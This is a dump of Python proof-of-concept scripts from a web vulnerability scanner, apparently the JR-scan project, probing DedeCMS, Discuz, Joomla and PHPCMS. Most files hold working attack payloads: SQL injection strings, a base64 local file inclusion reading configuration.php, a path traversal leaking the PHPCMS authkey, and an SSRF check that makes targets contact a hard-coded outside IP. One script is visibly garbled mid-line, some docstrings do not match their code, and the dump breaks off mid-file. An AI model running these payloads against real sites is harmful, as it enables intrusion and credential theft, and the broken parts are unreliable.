/POC_Scan/cms/dedecms/dedecms_version.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms版本探测
5 | referer: unknow
6 | author: Lucifer
7 | description: 亿邮邮件系统存在弱口令账户信息泄露,导致非法登录
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class dedecms_version_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def check_ver(self, arg):
20 | ver_histroy = {'20080307': 'v3 or v4 or v5',
21 | '20080324': 'v5 above',
22 | '20080807': '5.1 or 5.2',
23 | '20081009': 'v5.1sp',
24 | '20081218': '5.1sp',
25 | '20090810': '5.5',
26 | '20090912': '5.5',
27 | '20100803': '5.6',
28 | '20101021': '5.3',
29 | '20111111': 'v5.7 or v5.6 or v5.5',
30 | '20111205': '5.7.18',
31 | '20111209': '5.6',
32 | '20120430': '5.7SP or 5.7 or 5.6',
33 | '20120621': '5.7SP1 or 5.7 or 5.6',
34 | '20120709': '5.6',
35 | '20121030': '5.7SP1 or 5.7',
36 | '20121107': '5.7',
37 | '20130608': 'V5.6-Final',
38 | '20130922': 'V5.7SP1'}
39 | ver_list = sorted(list(ver_histroy.keys()))
40 | ver_list.append(arg)
41 | sorted_ver_list=sorted(ver_list)
42 | return ver_histroy[ver_list[sorted_ver_list.index(arg) - 1]]
43 |
44 | def run(self):
45 | headers = {
46 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
47 | }
48 | payload = "/data/admin/ver.txt"
49 | vulnurl = self.url + payload
50 | try:
51 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
52 | m = re.search("^(\d+)$", req.text)
53 | if m:
54 | cprint("[+]探测到dedecms版本...(敏感信息)\t时间戳: %s, 版本信息: %s"%(m.group(1), self.check_ver(m.group(1))), "green")
55 | return True
56 | else:
57 | cprint("[-]不存在dedecms_version漏洞", "white", "on_grey")
58 |
59 | except:
60 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
61 |
62 | if __name__ == "__main__":
63 | warnings.filterwarnings("ignore")
64 | testVuln = dedecms_version_BaseVerify(sys.argv[1])
65 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/discuz_focus_flashxss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz X3 focus.swf flashxss漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件中focus.swf存在flashxss。
8 | '''
9 | import sys
10 | import urllib
11 | import hashlib
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class discuz_focus_flashxss_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | flash_md5 = "c16a7c6143f098472e52dd13de85527f"
25 | payload = "/static/image/common/focus.swf"
26 | vulnurl = self.url + payload
27 | try:
28 | req = urllib.request.urlopen(vulnurl)
29 | data = req.read()
30 | md5_value = hashlib.md5(data).hexdigest()
31 | if md5_value in flash_md5:
32 | cprint("[+]存在discuz X3 focus.swf flashxss漏洞...(高危)\tpayload: "+vulnurl, "red")
33 | return True
34 | else:
35 | cprint("[-]不存在discuz_focus_flashxss漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = discuz_focus_flashxss_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/discuz_forum_message_ssrf.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz论坛forum.php参数message SSRF漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: trs infogate插件 blind XML实体注入。
8 | '''
9 | import sys
10 | import time
11 | import hashlib
12 | import datetime
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
17 | class discuz_forum_message_ssrf_BaseVerify:
18 | def __init__(self, url):
19 | self.url = url
20 |
21 | def run(self):
22 | headers = {
23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
24 | }
25 | time_stamp = time.mktime(datetime.datetime.now().timetuple())
26 | m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
27 | md5_str = m.hexdigest()
28 | payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/"+md5_str+".jpg[/img]&formhash=09cec465"
29 | vulnurl = self.url + payload
30 | try:
31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
32 | eye_url = "http://45.76.158.91/web.log"
33 | time.sleep(6)
34 | reqr = requests.get(eye_url, timeout=10, verify=False)
35 | if md5_str in reqr.text:
36 | cprint("[+]存在discuz论坛forum.php参数message SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow")
37 | return True
38 | else:
39 | cprint("[-]不存在discuz_forum_message_ssrf漏洞", "white", "on_grey")
40 |
41 | except:
42 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
43 |
44 | if __name__ == "__main__":
45 | warnings.filterwarnings("ignore")
46 | testVuln = discuz_forum_message_ssrf_BaseVerify(sys.argv[1])
47 | testVuln.run()
48 |
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/discuz_plugin_ques_sqli.py:
--------------------------------------------------------------------------------
1 |
2 | #!/usr/bin/env python
3 | # -*- coding: utf-8 -*-
4 | '''
5 | name: discuz问卷调查参数orderby注入漏洞
6 | referer: http://0day5.com/archives/3184/
7 | author: Lucifer
8 | description: 文件plugin.php中,参数orderby存在SQL注入。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class discuz_plugin_ques_sqli_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
28 | cprint("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: "+vulnurl, "red")
29 | return True
30 | else:
31 | cprint("[-]不存在discuz_plugin_ques_sqli漏洞", "white", "on_grey")
32 |
33 | except:
34 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 |
36 | if __name__ == "__main__":
37 | warnings.filterwarnings("ignore")
38 | testVuln = discuz_plugin_ques_sqli_BaseVerify(sys.argv[1])
39 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/discuz_x25_path_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz! X2.5 物理路径泄露漏洞
5 | referer: http://www.uedbox.com/discuzx25-explosive-path/
6 | author: Lucifer
7 | description: 报错导致路径泄露。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class discuz_x25_path_disclosure_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payloads = ["/uc_server/control/admin/db.php",
24 | "/source/plugin/myrepeats/table/table_myrepeats.php",
25 | "/install/include/install_lang.php"]
26 | try:
27 | for payload in payloads:
28 | vulnurl = self.url + payload
29 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
30 | pattern = re.search('Fatal error.* in ([^<]+) on line (\d+)', req.text)
31 | if pattern:
32 | cprint("[+]存在Discuz! X2.5 物理路径泄露漏洞...(低危)\tpayload: "+vulnurl+"\tGet物理路径: "+pattern.group(1), "green")
33 | return True
34 | else:
35 | cprint("[-]不存在discuz_x25_path_disclosure漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = discuz_x25_path_disclosure_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/joomla_com_docman_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla组件com_docman本地文件包含
5 | referer: https://www.exploit-db.com/exploits/37620
6 | author: Lucifer
7 | description: joomla组件com_docman 文件com_docman/dl2.php中参数file被base64解码后可造成文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class joomla_com_docman_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA="
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = joomla_com_docman_lfi_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/joomla_index_list_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla 3.7.0 core SQL注入
5 | referer: https://www.08sec.com/bobao/15167.html
6 | author: Lucifer
7 | description: joomla!3.7.0新引入的一个组件”com_fields“,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入.
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class joomla_index_list_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
27 | cprint("[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | return True
29 | else:
30 | cprint("[-]不存在joomla_index_list_sqli漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = joomla_index_list_sqli_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_authkey_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms authkey泄露
5 | referer: http://wooyun.org/bugs/wooyun-2015-0105242
6 | author: Lucifer
7 | description: PHPCMS authkey 泄露漏洞,可引起SQL注入。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpcms_authkey_disclosure_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\\applist&path=admin"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | m = re.search('(\w{32})',req.text)
28 | if req.status_code == 200 and m:
29 | cprint("[+]存在PHPCMS authkey泄露漏洞...(高危)\tpayload: "+vulnurl+"\tauthkey: "+m.group(1), "red")
30 | return True
31 | else:
32 | cprint("[-]不存在phpcms_authkey_disclosure漏洞", "white", "on_grey")
33 |
34 | except:
35 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 |
37 | if __name__ == "__main__":
38 | warnings.filterwarnings("ignore")
39 | testVuln = phpcms_authkey_disclosure_BaseVerify(sys.argv[1])
40 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_digg_add_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms digg_add.php SQL注入
5 | referer: http://www.shangxueba.com/jingyan/2195152.html
6 | author: Lucifer
7 | description: 文件digg_add.php中,参数digg_mod存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_digg_add_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(1234),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在PHPCMS digg_add.php SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
28 | return True
29 | else:
30 | cprint("[-]不存在phpcms_digg_add_sqli漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = phpcms_digg_add_sqli_BaseVerify(sys.argv[1])
38 | testVuln.run()
39 |
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_flash_upload_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms2008 flash_upload.php SQL注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件flash_upload.php中,参数modelid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_flash_upload_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/flash_upload.php?modelid=%30%20%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"63e1f04640e83605c1d177544a5a0488" in req.text:
27 | cprint("[+]存在phpcms2008 flash_upload.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | return True
29 | else:
30 | cprint("[-]不存在phpcms_flash_upload_sqli漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = phpcms_flash_upload_sqli_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_product_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms2008 product.php 代码执行
5 | referer: http://www.wooyun.org/bugs/WooYun-2011-02984
